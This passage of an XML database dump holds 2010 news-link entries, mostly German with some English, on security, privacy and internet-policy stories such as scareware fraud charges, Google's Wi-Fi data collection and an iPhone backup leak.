Commission (FTC) filed similar charges against operators of the same
companies in 2008. Shaileshkumar P. Jain, Bjorn Daniel Sundin and James
Reno are all facing charges of wire fraud, computer fraud, and
conspiracy to commit computer fraud.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/05/28/scarware_scam_charges/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/07/3-men-charged-in-100m-scareware-scam-the-regist.png</field><field type="SlugField" name="slug">3-men-charged-in-100m-scareware-scam-the-regist</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-07 23:16:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">fraud malware scareware</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="211" model="submitter.newsentry"><field type="CharField" name="title"> FTC asks Google not to destroy documents about Wi-Fi data collection - latimes.com</field><field type="TextField" name="excerpt">Sind Daten erst mal da ... Was wollen Regierungen oder die FTC damit?
The Federal Trade Commission (FTC) has asked Google not to destroy any
of the documents about data it collected from unsecured Wi-Fi networks
in 33 countries while trolling for images for its Street View feature.
Google maintains the 600 gigabytes of "fragmentary data" were collected
inadvertently. Google has already destroyed data collected in Denmark,
Ireland and Austria after the countries requested that action. Google
has yet to surrender the information to regulators in any of the
countries.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Sind Daten erst mal da ... Was wollen Regierungen oder die FTC damit?
&lt;/p&gt;
&lt;p&gt;The Federal Trade Commission (FTC) has asked Google not to destroy any
of the documents about data it collected from unsecured Wi-Fi networks
in 33 countries while trolling for images for its Street View feature.
Google maintains the 600 gigabytes of "fragmentary data" were collected
inadvertently. Google has already destroyed data collected in Denmark,
Ireland and Austria after the countries requested that action. Google
has yet to surrender the information to regulators in any of the
countries.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.latimes.com/business/la-fi-google-20100528,0,4596451.story</field><field type="FileField" name="page_screenshot">page_shots/2010/06/07/ftc-asks-google-not-to-destroy-documents-about-wi_.png</field><field type="SlugField" name="slug">ftc-asks-google-not-to-destroy-documents-about-wi</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-07 23:12:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">dataloss google</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="210" model="submitter.newsentry"><field type="CharField" name="title">U.S. intelligence analyst investigated for allegedly divulging classified information</field><field type="TextField" name="excerpt">Manner soll der Collateral Damage Leaker gewesen sein. Das hat er seinem Kumpel Lamo, einem Ex-Hacker (New York Times Accounts gehackt) erzählt. Fefe vermutet, das ist um WL zu diskreditieren. Der Wired-Autor: Passt übrigens prächtig, denn Poulson war auch derjenige, der kürzlich in Wired diese Agitprop-Story gebracht hatte, dass Wikileaks ihre Informationen illegitim aus Tor-Sniffing erlangt hätten, was sowohl Tor als auch Wikileaks dementieren.
Interessant auch, dass die Washingtom Post wohl ein Jahr das Video hatte.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Manner soll der Collateral Damage Leaker gewesen sein. Das hat er seinem Kumpel Lamo, einem Ex-Hacker (New York Times Accounts gehackt) erzählt. Fefe vermutet, das ist um WL zu diskreditieren. Der Wired-Autor: Passt übrigens prächtig, denn Poulson war auch derjenige, der kürzlich in Wired diese Agitprop-Story gebracht hatte, dass Wikileaks ihre Informationen illegitim aus Tor-Sniffing erlangt hätten, was sowohl Tor als auch Wikileaks dementieren.
Interessant auch, dass die Washingtom Post wohl ein Jahr das Video hatte.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.washingtonpost.com/wp-dyn/content/article/2010/06/07/AR2010060702381_2.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/07/us-intelligence-analyst-investigated-for-alleged_.png</field><field type="SlugField" name="slug">us-intelligence-analyst-investigated-for-alleged</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-07 22:12:07</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">wikileaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="209" model="submitter.newsentry"><field type="CharField" name="title">Fake gegen Fake: Wie die Horst-Köhler-Satire verschwand - taz.de</field><field type="TextField" name="excerpt">Auf der Seite horst-koehler-consulting.de bot vermeintlich der Bundespräsident a.D. Horst Köhler Unternehmen Beratung auf Basis seiner militär- und außenhandelspolitischen Kompetenzen an. Zu seinem Kompetenzteam sollten unter anderem Ex-Bundeskanzler Gerhard Schröder, verantwortlich für „Putin Relations“, Ex-Außenminister Joschka Fischer, verantwortlich für „Green Warfare“, sowie Ex-Bundeskanzler Kohl, als „Head of Secret Accountance“ zählen die Seite mussten für jeden klar als Satire zu erkennen sein.
Die Website schaffte es auf bis zu 2.000 Klicks pro Sekunde. Doch: Nur wenige Stunden nach Veröffentlichung verschwand sie wieder aus dem Netz. Unter der URL war sie zwischenzeitlich nicht mehr zu finden und selbst im Google Cache, dem Kurzzeitgedächtnis des Suchportals, war sie bereits nach wenigen Stunden verschwunden.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Auf der Seite horst-koehler-consulting.de bot vermeintlich der Bundespräsident a.D. Horst Köhler Unternehmen Beratung auf Basis seiner militär- und außenhandelspolitischen Kompetenzen an. Zu seinem Kompetenzteam sollten unter anderem Ex-Bundeskanzler Gerhard Schröder, verantwortlich für „Putin Relations“, Ex-Außenminister Joschka Fischer, verantwortlich für „Green Warfare“, sowie Ex-Bundeskanzler Kohl, als „Head of Secret Accountance“ zählen die Seite mussten für jeden klar als Satire zu erkennen sein.
&lt;/p&gt;
&lt;p&gt;Die Website schaffte es auf bis zu 2.000 Klicks pro Sekunde. Doch: Nur wenige Stunden nach Veröffentlichung verschwand sie wieder aus dem Netz. Unter der URL war sie zwischenzeitlich nicht mehr zu finden und selbst im Google Cache, dem Kurzzeitgedächtnis des Suchportals, war sie bereits nach wenigen Stunden verschwunden.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.taz.de/1/netz/netzkultur/artikel/1/wie-die-horst-koehler-satire-verschwand/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/07/fake-gegen-fake-wie-die-horst-kohler-satire-versc.png</field><field type="SlugField" name="slug">fake-gegen-fake-wie-die-horst-kohler-satire-versc</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-07 00:15:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="208" model="submitter.newsentry"><field type="CharField" name="title">Russias Anti-Spam Chief Faces Spamming Charges - SPAMfighter</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.spamfighter.com/News-14502-Russias-Anti-Spam-Chief-Faces-Spamming-Charges.htm</field><field type="FileField" name="page_screenshot">page_shots/2010/06/07/russias-anti-spam-chief-faces-spamming-charges.png</field><field type="SlugField" name="slug">russias-anti-spam-chief-faces-spamming-charges</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-05 08:43:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">spam</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="207" model="submitter.newsentry"><field type="CharField" name="title">Nicht nur nackte Tatsachen: Was Apple alles zensiert - n-tv.de</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.n-tv.de/technik/Was-Apple-alles-zensiert-article904627.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/05/nicht-nur-nackte-tatsachen-was-apple-alles-zensie.png</field><field type="SlugField" name="slug">nicht-nur-nackte-tatsachen-was-apple-alles-zensie</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-05 08:35:25</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="206" model="submitter.newsentry"><field type="CharField" name="title">heise online - Samsung Wave mit Virus ab Werk - aber nur in Deutschland</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Samsung-Wave-mit-Virus-ab-Werk-aber-nur-in-Deutschland-1014881.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/03/heise-online-samsung-wave-mit-virus-ab-werk-ab.png</field><field type="SlugField" name="slug">heise-online-samsung-wave-mit-virus-ab-werk-ab</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-03 17:27:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="205" model="submitter.newsentry"><field type="CharField" name="title">Slashdot Technology Story | EU To Monitor All Internet Searches</field><field type="TextField" name="excerpt">Natürli gegen kipo.
"The European Parliament is issuing a written declaration about the need to set up an early warning system to combat sexual child abuse. However, the substance of the declaration is to extend the EU data retention directive to search engines, so that all searches done on for example Google will be monitored. If you are a citizen concerned about the right to privacy and freedom on the Internet, you can help by sending e-mail to the MEPs from your country and explaining the issue to them."</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Natürli gegen kipo.
&lt;/p&gt;
&lt;p&gt;"The European Parliament is issuing a written declaration about the need to set up an early warning system to combat sexual child abuse. However, the substance of the declaration is to extend the EU data retention directive to search engines, so that all searches done on for example Google will be monitored. If you are a citizen concerned about the right to privacy and freedom on the Internet, you can help by sending e-mail to the MEPs from your country and explaining the issue to them."
&lt;/p&gt;</field><field type="CharField" name="external_url">http://tech.slashdot.org/story/10/06/02/2317241/EU-To-Monitor-All-Internet-Searches</field><field type="FileField" name="page_screenshot">page_shots/2010/06/03/slashdot-technology-story-eu-to-monitor-all-inte_.png</field><field type="SlugField" name="slug">slashdot-technology-story-eu-to-monitor-all-inte</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-03 10:55:05</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="204" model="submitter.newsentry"><field type="CharField" name="title">heise online - Luc Besson arbeitet bei neuem Film mit Internet-Community zusammen </field><field type="TextField" name="excerpt">Zumindest ein aufeinander zu gehen. in Sendung etwas disutieren.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Zumindest ein aufeinander zu gehen. in Sendung etwas disutieren.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Luc-Besson-arbeitet-bei-neuem-Film-mit-Internet-Community-zusammen-1013701.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/03/heise-online-luc-besson-arbeitet-bei-neuem-film.png</field><field type="SlugField" name="slug">heise-online-luc-besson-arbeitet-bei-neuem-film</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-03 10:34:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="203" model="submitter.newsentry"><field type="CharField" name="title">Trend Micro Data Loss Prevention version 5.2 suffers from a data leakage vulnerability.</field><field type="TextField" name="excerpt">Trend Micro Data Loss Prevention version 5.2 suffers from a data leakage vulnerability.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Trend Micro Data Loss Prevention version 5.2 suffers from a data leakage vulnerability.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://packetstormsecurity.org/filedesc/trendmicrodlp-dataleakage.pdf.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/02/trend-micro-data-loss-prevention-version-52-suffe.png</field><field type="SlugField" name="slug">trend-micro-data-loss-prevention-version-52-suffe</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-02 11:33:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="202" model="submitter.newsentry"><field type="CharField" name="title">no more win at google</field><field type="TextField" name="excerpt">Google verbannt ms Win aus dem Unternehmen. noch os x und linux. grund: Sicherheit. hmm m(</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google verbannt ms Win aus dem Unternehmen. noch os x und linux. grund: Sicherheit. hmm m(
&lt;/p&gt;</field><field type="CharField" name="external_url">http://futurezone.orf.at/stories/1649477/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/07/no-more-win-at-google.png</field><field type="SlugField" name="slug">no-more-win-at-google</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-01 11:04:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">google microsoft windows</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="201" model="submitter.newsentry"><field type="CharField" name="title">das grosse Löschen</field><field type="TextField" name="excerpt">80 bis 90 prozent muss z. b. beim wdr gelöscht werden</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;80 bis 90 prozent muss z. b. beim wdr gelöscht werden
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wdr.de/themen/kultur/medien/staatsvertrag_zwoelfter/verweildauer.jhtml</field><field type="FileField" name="page_screenshot">page_shots/2010/06/01/das-grosse-loschen.png</field><field type="SlugField" name="slug">das-grosse-loschen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-01 11:01:57</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="200" model="submitter.newsentry"><field type="CharField" name="title">Webcam knows how to snub shoulder surfers</field><field type="TextField" name="excerpt">build in camera to detect shoulder surfing</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;build in camera to detect shoulder surfing
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.newscientist.com/article/mg20627624.100-webcam-knows-how-to-snub-shoulder-surfers.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/01/webcam-knows-how-to-snub-shoulder-surfers-tech_.png</field><field type="SlugField" name="slug">webcam-knows-how-to-snub-shoulder-surfers-tech</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-01 09:12:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="199" model="submitter.newsentry"><field type="CharField" name="title">Blogs stürzen Bundespräsident?</field><field type="TextField" name="excerpt">Interessante These:
Der Rücktritt von Horst Köhler ist nicht nur der erste Rücktritt eines Bundespräsidenten mit sofortiger Wirkung, sondern auch ein Rücktritt unter maßgeblicher Blog-Beteiligung. Denn die Thematisierung seiner Formulierung von den “freien Handelswege” verlief in bemerkenswerten Wellen. Dabei wurde das Thema zuerst von Blogs aufgegriffen und als Skandal identifiziert.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Interessante These:
Der Rücktritt von Horst Köhler ist nicht nur der erste Rücktritt eines Bundespräsidenten mit sofortiger Wirkung, sondern auch ein Rücktritt unter maßgeblicher Blog-Beteiligung. Denn die Thematisierung seiner Formulierung von den “freien Handelswege” verlief in bemerkenswerten Wellen. Dabei wurde das Thema zuerst von Blogs aufgegriffen und als Skandal identifiziert.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://carta.info/28218/horst-koehler-ein-ruecktritt-unter-blog-mitwirkung/</field><field type="FileField" name="page_screenshot">page_shots/2010/06/07/no_page_shot.png</field><field type="SlugField" name="slug">blogs-stuerzen-bundeskanzer</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-31 23:08:10</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">blog</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="198" model="submitter.newsentry"><field type="CharField" name="title">Freie Bahn für Softwarepatente</field><field type="TextField" name="excerpt">Der Bundesgerichtshof sieht praktisch jedes Verfahren, das sich als Computerprogramm implementieren lässt, als technisch und somit patentierbar an. Das geht aus einem aktuellen Beschluss zu einer Patentanmeldung für die "dynamische Dokumentengenerierung" hervor.
Mit diesem Beschluss hat der BGH eine anderslautende Entscheidung des Bundespatentgerichts vom 17. Januar 2008 aufgehoben. Dieses hatte die Siemens-Patentanmeldung DE 102 32 674.6 mit dem Titel "Verfahren zur dynamischen Generierung strukturierter Dokumente" wegen des Fehlens einer erfinderischen Tätigkeit abgelehnt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der Bundesgerichtshof sieht praktisch jedes Verfahren, das sich als Computerprogramm implementieren lässt, als technisch und somit patentierbar an. Das geht aus einem aktuellen Beschluss zu einer Patentanmeldung für die "dynamische Dokumentengenerierung" hervor.
Mit diesem Beschluss hat der BGH eine anderslautende Entscheidung des Bundespatentgerichts vom 17. Januar 2008 aufgehoben. Dieses hatte die Siemens-Patentanmeldung DE 102 32 674.6 mit dem Titel "Verfahren zur dynamischen Generierung strukturierter Dokumente" wegen des Fehlens einer erfinderischen Tätigkeit abgelehnt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.golem.de/1005/75277.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/31/freie-bahn-fur-softwarepatente.png</field><field type="SlugField" name="slug">freie-bahn-fur-softwarepatente</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-31 21:57:50</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="197" model="submitter.newsentry"><field type="CharField" name="title">iPhone gibt Daten an fremde Rechner weiter</field><field type="TextField" name="excerpt">The Any iPhone Backup
Auch gesperrte Daten (z.B. Passwörter, SMS) lassen sich aus iPhone auslesen wenn sie an fremden PC (z.B. mit iTunes) angeschlossen würden…
(http://heise-online.mobi/security/meldung/Luecke-in-Datenverschluesselung-des-iPhones-1007818.html)
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The Any iPhone Backup
&lt;/p&gt;
&lt;p&gt;Auch gesperrte Daten (z.B. Passwörter, SMS) lassen sich aus iPhone auslesen wenn sie an fremden PC (z.B. mit iTunes) angeschlossen würden…
&lt;/p&gt;
&lt;p&gt;(http://heise-online.mobi/security/meldung/Luecke-in-Datenverschluesselung-des-iPhones-1007818.html)
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/iPhone-Leck-weitet-sich-aus-1012473.html/from/atom10</field><field type="FileField" name="page_screenshot">page_shots/2010/06/01/iphone-gibt-daten-an-fremde-rechner-weiter_.png</field><field type="SlugField" name="slug">iphone-gibt-daten-an-fremde-rechner-weiter</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-31 20:19:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">apple iphone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="9"></object></field></object><object pk="196" model="submitter.newsentry"><field type="CharField" name="title">facebook-telefonbuch-grabscher</field><field type="TextField" name="excerpt">iPhone App downloaded das Adressbuch, genannt *Telefonbuchgrabscher* bei SpOn</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;iPhone App downloaded das Adressbuch, genannt &lt;em&gt;Telefonbuchgrabscher&lt;/em&gt; bei SpOn
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spiegel.de/netzwelt/web/0,1518,697733,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/31/facebook-telefonbuch-grabscher.png</field><field type="SlugField" name="slug">facebook-telefonbuch-grabscher</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-31 20:04:14</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="195" model="submitter.newsentry"><field type="CharField" name="title">If You See Something, Think Twice About Saying Something</field><field type="TextField" name="excerpt">The Travis County Criminal Justice Center was closed for most of the day on Friday, May 14, after a man reported that a "suspicious package" had been left in the building. The court complex was evacuated, and the APD Explosive Ordinance Disposal Unit was called in for a look-see. The package in question, a backpack, contained paperwork but no explosive device. The building reopened at 1:40pm. The man who reported the suspicious package, Douglas Scott Hoopes, was arrested and charged with making a false report and booked into the jail. The charge is a felony punishable by up to two years in jail.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The Travis County Criminal Justice Center was closed for most of the day on Friday, May 14, after a man reported that a "suspicious package" had been left in the building. The court complex was evacuated, and the APD Explosive Ordinance Disposal Unit was called in for a look-see. The package in question, a backpack, contained paperwork but no explosive device. The building reopened at 1:40pm. The man who reported the suspicious package, Douglas Scott Hoopes, was arrested and charged with making a false report and booked into the jail. The charge is a felony punishable by up to two years in jail.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.schneier.com/blog/archives/2010/05/if_you_see_some_1.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/30/if-you-see-something-think-twice-about-saying-som.png</field><field type="SlugField" name="slug">if-you-see-something-think-twice-about-saying-som</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-30 18:51:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="194" model="submitter.newsentry"><field type="CharField" name="title">heise online - Zugangsdaten von 44 Millionen Online-Spielern gestohlen</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Zugangsdaten-von-44-Millionen-Online-Spielern-gestohlen-1010566.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/29/heise-online-zugangsdaten-von-44-millionen-onlin.png</field><field type="SlugField" name="slug">heise-online-zugangsdaten-von-44-millionen-onlin</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-29 18:26:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="193" model="submitter.newsentry"><field type="CharField" name="title">voting machine @Texas Legislation </field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.youtube.com/watch?v=eG6X-xtVask</field><field type="FileField" name="page_screenshot">page_shots/2010/05/28/voting-machine-texas-legislation.png</field><field type="SlugField" name="slug">voting-machine-texas-legislation</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">15</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-28 18:24:20</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="192" model="submitter.newsentry"><field type="CharField" name="title">The Escapist : News : Warner Bros. Sued for Pirating Anti-Piracy Technology</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.escapistmagazine.com/news/view/100937-Warner-Bros-Sued-for-Pirating-Anti-Piracy-Technology</field><field type="FileField" name="page_screenshot">page_shots/2010/05/27/the-escapist-news-warner-bros-sued-for-pirati.png</field><field type="SlugField" name="slug">the-escapist-news-warner-bros-sued-for-pirati</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-27 20:50:52</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="191" model="submitter.newsentry"><field type="CharField" name="title">Save the Children Finnland in Verteilung von „Kinderpornografie“ verstrickt</field><field type="TextField" name="excerpt">Der folgende Artikel ist eine Übersetzung eines Textes von Matti Nikki aus Finnland. Er zeigt darin, wie die Kinderschutzorganisatiom Save the Children, die maßgeblich an der Etablierung von Internet-Sperren in Finnland und anderen skandinavischen Ländern beteiligt war, über Monate hinweg selbst bei der Verteilung von „Kinderpornografie“ indirekt mitgeholfen hat. Er zeigt die Problematik des Overblocking und wie schnell man zum Verbreiter einschlägiger Inhalte werden kann</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Der folgende Artikel ist eine Übersetzung eines Textes von Matti Nikki aus Finnland. Er zeigt darin, wie die Kinderschutzorganisatiom Save the Children, die maßgeblich an der Etablierung von Internet-Sperren in Finnland und anderen skandinavischen Ländern beteiligt war, über Monate hinweg selbst bei der Verteilung von „Kinderpornografie“ indirekt mitgeholfen hat. Er zeigt die Problematik des Overblocking und wie schnell man zum Verbreiter einschlägiger Inhalte werden kann
